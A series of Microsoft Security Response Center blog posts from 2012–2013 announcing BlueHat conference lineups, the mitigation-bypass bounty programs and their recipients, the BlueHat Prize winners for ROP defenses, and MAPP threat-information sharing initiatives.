Microsoft Technical Fellow, Anders Vinberg, will open BlueHat’s first track, Threat Landscape. Anders will talk about a broad assurance initiative for the next wave, covering Windows Server and System Center, in close alignment with the Core OS team, identity, Office and Azure. Next, we’ll set the stage with a talk from FireEye’s Zheng Bu and YiChong Lin designed to walk us through the techniques of the average and not so average targeted attacker, and show us ways to detect and combat the adversary. Microsoft Partner Development Manager, Mario Goertzel, will then speak to some of the hard problems that we face in antimalware – specifically, how we equip customers and partners with the right tools and analysis to help us all defend our networks and assets. Closing out the Threat Landscape track, Microsoft Principal Security Program Manager Lead, Graham Calladine, and Microsoft Senior Security Software Development Engineer, Thomas Garnier, will walk us through what attackers are doing now, how our current products and practices work against us, and how we can change this.

After lunch, the Devices & Services track kicks off with Josh Thomas, whose DARPA-funded research will reveal some hardware-level universal attacks that are possible on mobile devices. Next up we will have Microsoft’s first Mitigation Bypass Bounty recipient, James Forshaw, talk about executing unsigned code on the Surface RT without jailbreaking it. Next, Microsoft Principal Software Development Engineer, Lee Holmes, will talk with us about PowerShell. Chris Tarnovsky will then discuss semiconductor devices and their backward steps in physical security through higher Common Criteria ratings. Next up, we’ll hear from Microsoft Partner Development Manager, Chris Kaler, and Microsoft Senior Program Manager, Serge Mera, about the latest in Message Analyzer. Mario Heiderich will then take us into the wilds of JavaScript MVC and templating frameworks. The afternoon will wrap up with a call to action from our own Russ McRee, followed by several lightning talks.

Day 2: Friday, December 13

Taking into consideration the inevitable socializing from the night before, we’re giving our attendees a slow morning. Between 9:00 AM and 12:00 noon we’ll have a recovery brunch with mimosas, lightning talks, and the famed hallway track. I’ll give the Day 2 keynote, opening the Persistence of Trust track at 12:30 PM. My talk will focus on security strategy at Microsoft, what we’re doing in terms of our defensive industry partner programs like MAPP, and of course, I’ll provide an update on our strategic Bounty programs. I’ll then hand off to Justin Troutman, who will talk about Mackerel, a cryptographic design and development framework based on the premise that real-world cryptography is not about cryptography at all; it’s about products. Peter Gutmann, famed researcher with the University of Auckland, New Zealand, will take the stage and illuminate the psychology of computer insecurity. After a short break, Alex Stamos, CTO of Artemis Internet, and Tom Ritter, Principal Security Engineer with iSEC Partners, will awaken us with tales of life after elliptic curve crypto’s coming extinction. From Bromium Labs we’ll hear from Rahul Kashyap and Rafal Wojtczuk, who will discuss and demonstrate how to reliably break out of various popular sandboxes. Finally, closing BlueHat v13, renowned security and privacy expert and advocate of human rights, Morgan Marquis-Boire, will explore what I call the elephant in the room, as he discusses the surveillance landscape and coercion-resistant design.

As chair of the BlueHat content board, I would be remiss in my duty to the mission of BlueHat if I ignored the revelations of the summer of 2013, and the concerns about government surveillance of the internet. Hence, we will be continuing our internal dialog with a conversation with Morgan and others in attendance on how to design products, devices, and services that are more resistant to abuse and surveillance.  For us, and for over a billion of our customers worldwide, this issue transcends borders and politics. We are a global company and part of a global community, and as such we will continue to work with our customers, partners, and even our competitors to ensure a safer, more trustworthy Internet for all.

From the age of the great worms, to the evolution of more sophisticated and targeted attacks, to the era where modern warfare takes place on not only the information superhighway, but also on the civilian streets of the Internet, we will serve faithfully in our mission to help protect our customers from security and privacy breaches, no matter the adversary.


BlueHat is coming. Brace yourselves.


Katie Moussouris

Senior Security Strategist

Microsoft Security Response Center

(that’s a zero)


Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alive, 01 Nov 2013 10:20:00 +0000 Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does – or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi’s Wanted Dead or Alive, and it’s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.

Today, Microsoft is announcing the first evolution of its bounty programs, first announced in June of 2013. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can “sing along” to earn big bounty payouts than ever before.

Today’s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.

Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.  The stronger the shield, the less likely any individual bug or arrow can get through. Learning about “ways around the shield,” or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug – hence, we are willing to pay $100,000 for these rare new techniques.

Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:

  1. Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.

  2. Offering researchers a $100,000 bounty to teach us new mitigation bypass techniques enables us to build better defenses into our products faster and to provide workarounds and mitigations through tools such as EMET.

  3. Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses into our products. We will work whenever possible with our MAPP program and engage our community network of defenders to help mitigate these attacks more rapidly.

In this new expansion of Microsoft’s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. The submission criteria for both programs are similar – but the source may be different.

To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com. After you preregister and sign an agreement, then we’ll accept an entry of technical write-up and proof of concept code for bounty consideration.

We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we’ll pay for them even if they are currently being used in targeted attacks if the attack technique is new – because we want them dead or alive.

This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets. Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.  By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.

We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.


Katie Moussouris

Senior Security Strategist and karaoke MC

Microsoft Security Response Center

Congratulations to James Forshaw Recipient of Our First $100,000 Bounty for New Mitigation Bypass Techniques!, 08 Oct 2013 09:47:00 +0000

Congratulations to James Forshaw for coming up with a new exploitation technique to get our first ever $100,000 bounty. A security vulnerability researcher with Context Information Security, James already came in hot with design level bugs he found during the IE11 Preview Bug Bounty, and we’re thrilled to give him even more money for helping us improve our platform-wide security by leaps.

Coincidentally, one of our brilliant engineers at Microsoft, Thomas Garnier, had also found a variant of this class of attack technique. Microsoft engineers like Thomas are constantly evaluating ways to improve security, but James’ submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty.

While we can’t go into the details of this new mitigation bypass technique until we address it, we are excited that we will be better able to protect customers by creating new defenses for future versions of our products because we learned about this technique and its variants.

The reason we pay so much more for a new attack technique versus for an individual bug is that learning about new mitigation bypass techniques helps us develop defenses against entire classes of attack. This knowledge helps us make individual vulnerabilities less useful when attackers try to use them against customers. When we strengthen the platform-wide mitigations, we make it harder to exploit bugs in all software that runs on our platform, not just Microsoft applications.

If you have a new mitigation bypass technique that can defeat our latest platform-wide mitigations, or a new defense idea, and would like to participate in our bounty programs, please see the official guidelines here. For a technical description of an exploitation technique that would have qualified, please read the SRD blog by Matt Miller and William Peteroy here. If you have an idea that’s in scope, please send in your whitepaper and proof of concept code to secure [at] Microsoft [dot] com.

We’re not done evolving our freshly minted bounty programs, which have now paid out over $128,000. Watch this blog for future developments as we continue to hone the biggest ongoing vendor bounty program in the industry.

Until then, our special thanks go to James: Congratulations and well done! You not only made history by receiving a total of $109,400 from our bounty programs, you’re also helping us make our customers safer from entire classes of attack. On behalf of over a billion people worldwide — Thank you and way to go!!


Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center

Bounty News Update: Bountiful Harvest, 04 Oct 2013 13:21:00 +0000

Fall is a season traditionally associated with a harvest after planting the seeds and tending the crops. Today I’m proud to announce the names of six very smart people who have helped us make our products more secure by participating in our new bounty programs. When we launched our bounty programs in June this year, we had a few strategic goals in mind:

  • Increase the win-win between the hacker/security researcher community and Microsoft’s customers, and build relationships with new researchers in the process
  • Receive more vulnerability reports earlier in the release cycle of our products, ideally during the beginning of the preview (or beta) period
  • Learn about new exploitation techniques that can be used to defeat our platform-wide defenses, so we can build protections against entire classes of attack

Now that we have permission from the bounty program recipients to publish their names and bounty amounts, I’ll list them all here. You may have seen a few congratulatory and celebratory tweets; we wanted to officially acknowledge these security researchers who have helped our customers by participating in our bounty programs.


On behalf of over a billion customers, THANK YOU!
James Forshaw
Ivan Fratric
Jose Antonio Vazquez Gonzalez
Masato Kinugawa
Fermin J. Serna
Peter Vreugdenhil


I am also thrilled to highlight a few of our bounty program results:


We’ve worked with so many bright security researchers through the years, and are thrilled that through the bounty programs, we received reports from researchers who had never reported to us directly before. This means we have even more great minds interested in working directly with us to help make our products more secure.

IE11 Preview Bug Bounty:

During the first 30 days of the IE11 preview period we received several vulnerabilities that qualified for a bounty, in contrast to the first 30 days of the IE10 beta, when we did not receive any bulletin-class reports. The Preview period is a great time for us to receive these reports because we can address these issues earlier. Typically, researchers do not report these findings until after code has been released to manufacturing. With these submissions, we will be able to address these vulnerabilities earlier in the process, providing a more secure version of Internet Explorer.

As the leaves turn colors and the temperatures cool off, I’m happy to be sharing the bountiful harvest of our programs, started as seeds planted in early summer. It’s been a great first three months of Microsoft’s bounty programs, and we’re overjoyed that our programs have been met with great participation and enthusiasm from the hacker community.

Stay tuned for more news coming soon!

Katie Moussouris
Senior Security Strategist, Microsoft Security Response Center

MAPP Initiatives Update – Knowledge Exchange Platform, 16 Sep 2013 09:45:00 +0000

A little more than a month ago, we announced some new initiatives for the Microsoft Active Protections Program (MAPP). One of those announcements was “MAPP for Responders.” The initial response has been extremely positive, so we wanted to provide more information on how we are moving this program forward.

Since the announcement, we’ve been working towards launching two initiatives as a single beta with a limited set of customers and partners. The first is the pilot of the MAPP Scanner service that we previously announced.  The second initiative is a beta of a completely new automated knowledge exchange platform. We alluded to this platform in our first post and want to give some additional details on this project.

Simply put, this is a distributed platform, run as a web service, that automates the sharing and consumption of threat information in machine-readable formats. As mentioned before, the platform supports the STIX and TAXII open specifications developed by MITRE, but it has been designed to support any message exchange services and message formats that partners decide to implement. This helps to accomplish multiple goals, but here are two highlights:

First, the platform will empower the industry by facilitating the sharing of threat information and enabling knowledge exchange scenarios that do not exist today. As a platform, customers and partners will have the flexibility to share and consume data with granular control.

Second, the platform has been designed to be extremely extensible, with a modular plugin architecture that will allow for an unlimited number of services to be built on top of and supported by it.

Figures 1 – 3 illustrate some of the sharing scenarios enabled by the platform:


Figure 1 Publisher Subscriber


Figure 2 Peer to Peer


Figure 3 Hub and Spoke

We have designed this platform to integrate into existing environments acting as an interchange point between both external and internal services and data formats. The platform enables real-time information sharing, and because the data is machine-readable, organizations can choose to automatically push the data into their network protection systems.

I mentioned a limited beta with qualified customers and partners and wanted to list some of the criteria for participation. In addition to being able to sign required agreements and having a dedicated incident response team, participants in the initial beta will be required to provide a feed of threat data into the system. The beta will operate in phases with each lasting approximately 3 months. We expect to conduct three to four phases, expanding to more participants as we progress.

Many customers have already contacted us concerning participation and we will be following up with all of you very soon. For those enterprise customers who are interested in finding out more, the best path is to talk to your Microsoft Technical Account Manager (TAM). Other incident responders can send a note to

Keep an eye on this blog for future updates and announcements. We expect this work to go on for several months and are looking forward to input from participants to help shape the future of automated knowledge exchange.


Jerry Bryant
Senior Security Strategist Lead
Microsoft Trustworthy Computing

Nine to tide you over: Video highlights from BlueHat v12, 09 Apr 2013 12:52:00 +0000

It has been nearly four months since we gathered in Redmond for BlueHat v12, and we’ve almost caught up on our sleep. As we prepare for what promises to be a momentous year for the BlueHat program – culminating in December with BlueHat v13 – we’ve selected nine of the most compelling, talked-about, or just plain chewy talks from last year’s festivities to share with you.

  • Fraud and Abuse: A Survey of Life on the Internet Today –> WATCH IT ON DEMAND
    Ellen Cram Kowalczyk, Principal Security Program Manager Lead, Microsoft

    Kowalczyk kicked off BlueHat v12 in the morning with a look at two of the most difficult security issues facing our customers today. When you’re in the process of becoming the leading devices and services company, this is the sort of thing that’s on your mind every morning.

  • Social Authentication –> WATCH IT ON DEMAND
    Alex Rice, Product Security, Facebook

    Over the past year, Facebook engineers have been working on various attempts to expand authentication from “something you know” to “someone you know.” Rice’s talk demonstrates some of the results and details the lessons his company has learned along the way.

  • Scriptless Attacks: Stealing the Pie Without Touching the Sill –> WATCH IT ON DEMAND
    Mario Heiderich, Dr.-Ing, Ruhr-University in Bochum, Germany

    Removing JavaScript from the cross-site scripting equation doesn’t necessarily take away the XSS pain, as Dr. Heiderich demonstrates. Learn how attackers can use seemingly benign features to build side-channel attacks that can measure and exfiltrate data from even well-protected sites – and find out what can be done to stop it.

  • Sh*t My Cloud Evangelist Says… Just Not My CSO –> WATCH IT ON DEMAND
    Chris Hoff, Senior Director and Security Architect, Juniper Networks

    In front of an audience evenly divided between developers and security folk, Chris Hoff laid out the differences in worldview between the two – yes, there are a few – and how those translate into the world of cloud computing. More secure? Less secure? Let the debate begin…

  • Don’t Stand So Close to Me: An Analysis of the NFC Attack Surface –> WATCH IT ON DEMAND
    Charlie Miller, Systems Software Engineer, Twitter

    Near-field communication (NFC) technology is growing in popularity, with mobile devices leading the communications charge. But when you tap your phone to an NFC-enabled terminal to make a credit-card payment, how do you know you haven’t been owned – or worse? Miller looks at how NFC technology expands the potential attack surface for mobile devices.

  • Building Trustworthy Windows Store Apps –> WATCH IT ON DEMAND
    David Ross, Principal Software Security Engineer, Microsoft and Crispin Cowan, Senior Program Manager, Windows Security, Microsoft

    The Windows Store environment is designed to protect consumers’ machines and data from individual apps, but that puts serious responsibility on developers to use secure coding practices. Ross and Cowan look at what that means and how developers can approach the challenge without tears.

    Matthew Garrett, Senior Software Engineer, Nebula

    The Unified Extensible Firmware Interface (UEFI) brings far greater security to the firmware environment, letting developers build security policies that extend all the way into the most basic layers of shipped code. But do we lose platform differentiation in the process? Garrett details why that’s not necessarily the case.

  • Pass the Hash and Other Credential Theft and Reuse: Preventing Lateral Movement and Privilege Escalation –> WATCH IT ON DEMAND
    Patrick Jungles, Security Program Manager, Microsoft

    Credential theft and re-use attacks have gained in popularity in recent years, and there’s nothing tastier for some attackers than your delicious, delicious hashes. Jungles, the Microsoft PM who led the company-wide workgroup that researched and released our recent pass-the-hash whitepaper, presents an overview of the group’s findings.

  • Why Johnny Can’t Patch: And What We Can Do About It –> WATCH IT ON DEMAND
    David Seidman, Senior Security Program Manager, Microsoft

    Microsoft works hard to develop and release security bulletins as soon as we’re aware of a vulnerability that needs addressing. So how is it some users remain vulnerable to issues for which the cure has existed for months, if not years? Seidman dives deep into who doesn’t patch, why, and what might change their ways.

Enjoy! We’re looking forward to BlueHat v13 – Return to your “C:\>”(s). We suspect there will be a lot to talk about.

Emily Anderson
Security Program Manager, MSRC, Microsoft

On the Shoulders of Blue Giants, 13 Dec 2012 09:40:00 +0000

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team


BlueHat v12 here in Redmond is in full swing – it started yesterday for full-time Microsoft employees only, and continues today as we welcome our invited guests from beyond Microsoft. I’m excited to see and contribute to this year’s content as it unfolds on stage, and even more excited for all the side meetings that take place here in the hallways of the event.  It makes sense for us to take a moment to recognize the people who have contributed to BlueHat over the years, as well as to look forward to where we are going in terms of security community outreach at Microsoft in the years to come.

The BlueHat conference itself was groundbreaking in 2005, when the first group of hackers were invited by Window Snyder and Andrew Cushman to speak directly to Microsoft developers and executives about the products in which they were able to find security vulnerabilities. Back then, no major vendors had formally hosted an internal security conference before, but doing events like BlueHat is now an accepted industry practice for many major vendors.

We as an industry owe Window and Andrew our thanks for blazing this path, and also many thanks to the people over the years who have developed the BlueHat conference to be what it is today. That list includes but is not limited to Kymberlee Price, Celene Temkin, Dana Hehl, Sarah Blankinship, Mike Reavey and, most recently, Emily Anderson. Part of what makes BlueHat special to the speakers and attendees are the personal touches and vision that each person on the list above contributed.

One of the elements that makes BlueHat such a vital part of our overall security community outreach at Microsoft is the “hallway track.” This is where the invited guests and the Microsoft folks can dive deeper into the topics that are being presented, or diverge into other topics entirely – sometimes with far-reaching effects on improving security by leaps and bounds. As the conference has evolved over the years, some of the people we invite are here to meet with Microsoft engineers and to learn from the content that is presented, such as the MAPP partners we invite. It is the exchange of ideas that can help improve our products, as well as the products of others who are in attendance, that continues to make BlueHat special.

Many other conversations that will take place in the hallways at BlueHat over this week and beyond will help shape security defense for another generation of the Microsoft computing ecosystem. The relationships being forged and reinforced among Microsoft product teams, security engineers, and the external security research community in these halls will likely bear fruit in terms of helping to improve security for existing and future products and services.

There is an old saying that can be paraphrased as “If we can see a little further out into the horizon, it is because we are standing on the shoulders of giants.” Even as we face some familiar and not-so-familiar security frontiers such as online service security, mobile computing device security, app store security, and the ever-present human factor being exploited via social engineering attacks, we as members of a holistic global computing ecosystem will continue to benefit from the multi-directional exchange of ideas that happens at BlueHat.

Our team continues to expand the ways and means by which we facilitate these pivotal conversations, standing on the shoulders of “blue giants” who have built the security community outreach programs like the BlueHat conference itself, and our worldwide security conference sponsorship program.  As we evolve and grow, we add new programs to the overall outreach strategy to help us get better at security today and in the future. An example of a new program we added recently is the BlueHat Prize contest for security defense, for which this year we gave away over $260,000 in cash prizes for ideas in platform-level defense.  As I said on stage at BlueHat Wednesday morning, Microsoft will continue to invest in security defense challenges — and the next iteration of the BlueHat Prize contest will be announced around the time of the BlackHat USA conference next summer.

So to those who came before, thank you, and to those who will come after, enjoy the view.  I, for one, can’t wait to see what’s just over the horizon, and it’s looking very blue.

Katie Moussouris
Senior Security Strategist, MSRC

Announcing BlueHat v12, 21 Nov 2012 14:50:00 +0000

The days are getting shorter, the holidays are getting nearer, and looming on the horizon is a trio of 12’s – it’s almost time for the 12th BlueHat Conference, on tap for the twelfth month of 2012. We have a terrific lineup of speakers from both inside and outside the company; there’s nothing much we can do about the weather in Seattle in mid-December, but indoors we have compelling work to do on making the cloud, mobile devices, the Internet, and the rest of the computing ecosystem, safer for customers.

Here’s a quick overview of the planned speaker lineup for the two days of BlueHat v12. For more detail, please check back here in the weeks between now and the conference.

Day 1: Thursday, December 13

We’ll open the conference’s first track, Anti-Fraud & Abuse, with author and Microsoft Technical Fellow Mark Russinovich. Mark will also be joining attendees for a lunchtime book-signing (have you read Trojan Horse yet?). He’ll be followed in the morning by Microsoft’s Ellen Cram Kowalczyk, speaking on fraud and abuse, and specifically looking at life on the Internet today.  Facebook’s Alex Rice will give attendees a look into how the world’s biggest social-networking site handles attempts to abuse its users. After a short break, Christopher Hadnagy, author of “Social Engineering: The Art of Human Hacking,” joins us to discuss the role social engineering plays in successful (and unsuccessful) fraud attempts. Finally, Microsoft’s Alex Weinert will give us a look at his work at Microsoft on anti-fraud.

After lunch, the Cloud & Online Services track kicks off with Mario Heiderich, who’ll cover how, after sustained efforts to mitigate XSS and similar cross-site scripting attacks, an attack surface remains (and what can be done about that). He’s followed by Chris Hoff of Juniper Networks, speaking frankly about what cloud evangelists know…but won’t tell CSOs. We’ll have a break and rejoin the action with MSRC Engineering’s own Gavin Thomas, who looks at better security through Microsoft HPC Server and Windows Azure, followed by Tim Maletic and Chris Pogue of Trustwave discussing OPFOR. The afternoon wraps up with a call to action from Mark, followed by several lightning talks on subjects sure to surprise and delight.

Day 2: Friday, December 14

We’re giving you all a later start (9:45 AM), taking into consideration your socializing the night before. MSEC program manager and emcee Leigh Honeywell will open the second day of the conference at 9:45 AM with the Vices & Devices track. She’ll turn the floor over to Charlie Miller, who’s currently playing a major part in Twitter’s security push; he’ll talk about attack surfaces in the NFC (near-field communications) protocol stack. After a short break, Microsoft’s David Ross and Crispin Cowan dive into the world of Windows 8 applications. Matt Garrett of Red Hat joins us to answer “Why UEFI?” Lunch will feature an Online Services Security and Compliance (OSSC) Lunch n’ Learn, focusing on managing security risk to Microsoft’s global online services.

Friday afternoon brings the conference’s final track, Hot Topics, with a combination of guests, current Microsoft employees, and alumni on tap. First, James Forshaw of Context Information Security discusses the allure for security researchers of managed languages. Next, Fermín Serna – once a Microsoft colleague, now at Google – speaks of current thinking on information-leak vulnerabilities. After a break, MSRC senior security program manager David Seidman explains why some users simply won’t, don’t, or can’t apply security updates – whatever the consequences. The afternoon will close with Mat Honan, Senior Writer for Wired, whom we think will put the conference’s conversations and revelations in perspective as he describes how all the issues we’ve discussed can touch the lives of the customers we aim to protect.

Thanks –

Emily Anderson
Security Program Manager, MSRC

BlueHat: Something Old, Something New, All Blue, 24 Oct 2012 17:04:00 +0000

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team


Reflecting on my past five years at Microsoft (I know! How time flies!), I can see with fresh perspective just how far we’ve come, while staying true to our goals of helping to protect customers and the computing ecosystem. I just recently returned from maternity leave and launched right into conference season with a bang, speaking at several conferences where I had the opportunity to hang out with old and new friends in the security researcher community. As Microsoft completes its tenth year of working with the broader security community as part of our Trustworthy Computing tenet, it’s a good time to look at how the relationship has developed so far.

Our on-campus BlueHat Briefings started back in 2005. At the time we had two key goals: to expose our own developers and technical contacts to smart researchers both inside and outside our very large company, and to give researchers a conduit to the developers and tech folk who might not yet appreciate the value of thinking like an attacker. As you might guess, at the beginning there was suspicion and maybe even a little fear on both sides, as researchers came to Redmond, and executives and product teams came out of their comfort zones, to talk honestly about security.  But it worked, and others follow the model with similar conferences of their own now. And even as we prepare for the twelfth edition of the Briefings, it’s still great watching a researcher explain an issue directly to the developers responsible for writing the code to fix it.

Since then, the BlueHat Briefings have evolved into part of a larger strategy to play well within the community and improve the broader computing ecosystem. In addition to the Briefings, we provide direct financial sponsorship and support for other industry events around the world – this year, 20 or so conferences across 12 countries.  Some improvements in relations with individual researchers have been simple, like establishing our bulletin acknowledgement policy and Online Services Acknowledgements policy to recognize researchers who report issues directly to us. We recognize individual talent in other ways, offering contracts for penetration testing of products in development – in fact, many of the current pen-testing contracts in effect at Microsoft right now were born from researchers that have shown their talents by reporting issues to MSRC.  Sometimes, we’re able to hire this talent to Microsoft as well; we have great talent from the researcher community working here, and we’re always looking for more. And we don’t stop finding ways to work meaningfully with the community. This past summer, we awarded $260,000 to researchers as a part of the first-ever BlueHat Prize. This prize offers financial rewards to researchers to develop security defenses that can take out entire classes of attacks.

In seven weeks we will gather together at our 12th BlueHat Briefings here in Redmond and have this opportunity for the bidirectional exchange of ideas among people who are passionate about security, both inside and outside of Microsoft.  We have gone from listening and learning from the community to being a true part of it. As the landscape has changed, we’ve evolved our response and engagements and will continue to do so.

Where does this working relationship with this community — and the future of security research — go over the next 10 years? We’ll focus on building cool products that the researcher community will inevitably help us secure, in their own way – by reporting issues to us via Coordinated Vulnerability Disclosure, by coming to educate and “exploitain” our developers and executives at the BlueHat Briefings, and by working for Microsoft and becoming part of our internal security community to help us defend over a billion computer systems worldwide. We’re excited to imagine what the next decade will look like and how we’ll work together, and I’m just as curious today about what is next in the cobra-mongoose battle between attackers and defenders as I was when I joined this company over five years ago.

Stay tuned for the speaker line-up as we move closer to the event. I look forward to welcoming the next members of our elite group – our BlueHat community – as we evolve and grow together.

Katie Moussouris
Senior Security Strategist Lead

The BlueHat Prize V1.0 – And the Winners Are…, 26 Jul 2012 14:40:00 +0000

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team


As we wrap up the first BlueHat Prize contest, we wanted to share what we learned while running the first competition from a major vendor to offer a large cash prize for defensive security research. Not only did we get to motivate the development of technical mitigation technology, but we also achieved some valuable non-technical goals as well.

We’ll announce the winners in this post, so scroll down if you can’t wait.

Bonus #1: We identified security defense talent that we may never have encountered otherwise, and helped the world get to know them too.

Some of the contestants were certainly well-known names in the security research community; some were people we had never heard of before. Running the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve.

Bonus #2: We aligned some of the top “offensive security” minds to work with us on defense – with excellent results.

I often say that some of the best defenders come from the “offense” side of the security equation. I believe that you truly have to understand how to break into systems in order to devise effective plans for how to defend those systems. One of the goals we set out to accomplish with this contest was to create both an incentive and an opportunity for fame and fortune in the area of security defensive research that never existed at this scale before. We are very happy that the security community responded positively to our challenge, and some great minds chose to participate.

With those positive bonus outcomes we will not wait any longer to announce the winners. For an in-depth technical analysis of the winning entries, with the contest judging criteria applied, please see Matt Miller’s blog post on the SRD blog.


Vasilis Pappas wins $200,000 for his idea, kBouncer – an efficient and fully transparent ROP mitigation technique.

Ivan Fratric wins $50,000 for his idea, ROPGuard – a system that can detect and prevent the currently used forms of return-oriented programming (ROP) attacks at runtime. 

Jared DeMott wins an MSDN subscription, valued at $10,000, and was also surprised on stage live with a check for $10,000 cash for his idea, /ROP – a system that lowers the effect of address space disclosures and mitigates known ROP exploits. 


So what is next for the BlueHat Prize?

Check the BlueHat Prize website in the next several weeks for an updated page that will include information on the other contest entries. These beautiful minds all deserve the thanks and attention of the security community, and we are excited to provide them with a venue to showcase their defensive security ideas.

One thing is certain – we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both.

 – Katie Moussouris

Senior Security Strategist, MSRC

The BlueHat Prize Survey at BlackHat – Submit Security Defense Questions for a Chance to Win $5000, 16 Jul 2012 00:00:00 +0000


Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice


As we inch closer to Black Hat in Vegas this year, we wanted to kick off the ten-day countdown to our first BlueHat Prize contest winners’ announcement with an invitation to those attending Black Hat. Microsoft is conducting a survey at our Black Hat booth to find out what the security community thinks are the most important industry-wide security issues that need answers. When you participate in the survey at our booth, we’ll enter you into our BlueHat Prize Question Sweepstakes for a chance to win $5,000 USD*!

We will give away $5,000 twice per day at random drawings at our booth on July 25 and July 26 – once around lunch and once at the end of each day – for a total of $20,000 USD in cash.

The official rules are found here, but here are some highlights:

• The only way to enter this contest is to visit the Microsoft booth in person at Black Hat and submit a question.
• Only one entry per person is allowed (we’ll scan your conference badge, so no funny business!).
• Valid entries in the sweepstakes must be a defense-oriented security question that could potentially be used in a future BlueHat Prize contest.
• The issue you submit should be industry-wide, e.g., “Design a defense technology or strategy to defend against social engineering.” or “What would be the best approach to defend against DDoS?”

While we may not use the specific defense-oriented questions gathered in this sweepstakes, the survey will help us shape a future BlueHat Prize contest with the input from the broader security community. We know not everyone makes it to Black Hat, but we do think there is a decent sampling of various security industry representatives there, so as a survey it works as a decent sample set. If you’d like to let your thoughts be heard, even if you are not at Black Hat, feel free to join the conversation on Twitter with the hashtag #BlueHatPrize.

As for when we will announce what the next BlueHat Prize contest will be, stay tuned for that news on this blog after Black Hat. For those of you attending Black Hat in person this year, start thinking about what you believe is the biggest industry-wide security issue that needs a great defense. Microsoft may use your idea in our next BlueHat Prize contest, and you might win $5000!

Katie Moussouris

Senior Security Strategist, MSRC

*No Purchase Necessary. Open only to registered event attendees 14+. Game ends 7/26/12. For additional details, see Official Rules posted on-site at the Microsoft booth.

BlueHat Prize v1.0 Finalists – One of These People Will Win $200,000 (AKA Mad Loot)!, 21 Jun 2012 00:00:00 +0000


When we announced the BlueHat Prize on August 3, 2011, we did something that no major vendor had ever done before – offer a large cash prize for defensive security research. While a few vendors and others were offering relatively small cash incentives for security researchers to find and report individual vulnerabilities, we decided that, as a platform provider, Microsoft would be most effective if it sought out new, platform-level, defensive technologies that could possibly help defend against entire classes of vulnerabilities. These defenses could help protect our own applications, and have the potential to protect third-party applications that run on our platform.

We received 20 entries to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community – some from academia, some recognized names in the hacker community, and some from other venues entirely. Interestingly, about half of the entries poured in during the last few days – and even the last few hours and minutes – of the contest entry period. Also of note, most of the top-rated entries were among those last-minute submissions, perhaps substantiating the old adage that brilliance emerges under the glaring pressure of a looming deadline. One thing we learned from this experience was not to set future contest deadlines for midnight on a Sunday!

Getting down to business, here are the names of the three finalists, in alphabetical order:

Jared DeMott

Ivan Fratric

Vasilis Pappas

We will award the prizes to the winners at a 10 p.m. ceremony at our researcher appreciation party on July 26, 2012. We have notified the finalists that they have made it to the finals. The finalists won’t know who won which prize – the grand prize of $200,000 USD, the second prize of $50,000 USD, and the third prize of an MSDN subscription, valued at $10,000 USD – until we reveal it to them and the world live on July 26.

You can read a little about each of them and their proposed solutions on our BlueHat Prize contest site. After the contest is over, we’ll also be putting up the names and abstracts of the other contestants, so stay tuned for that update sometime after Black Hat.

For now, please join us as we congratulate all the contestants, and especially the three finalists. We appreciate their hard work, and are excited that we can help showcase their ideas that can help make advancements in platform-level security defense.

– Katie Moussouris

Senior Security Strategist, MSRC

Inside the MAPP program, 02 May 2012 22:39:00 +0000


Maarten Van Horenbeeck

Senior Program Manager

Slicing covert channels, foraging in remote memory pools, and setting off page faults

The crackling sound of crypto breaking, warm vodka martini

Hi everyone,

Maarten here – my team manages the Microsoft Active Protections Program (MAPP) at Microsoft. MAPP gives defenders a head start by sharing vulnerability information with them so that protection signatures are ready at the same time as security updates.

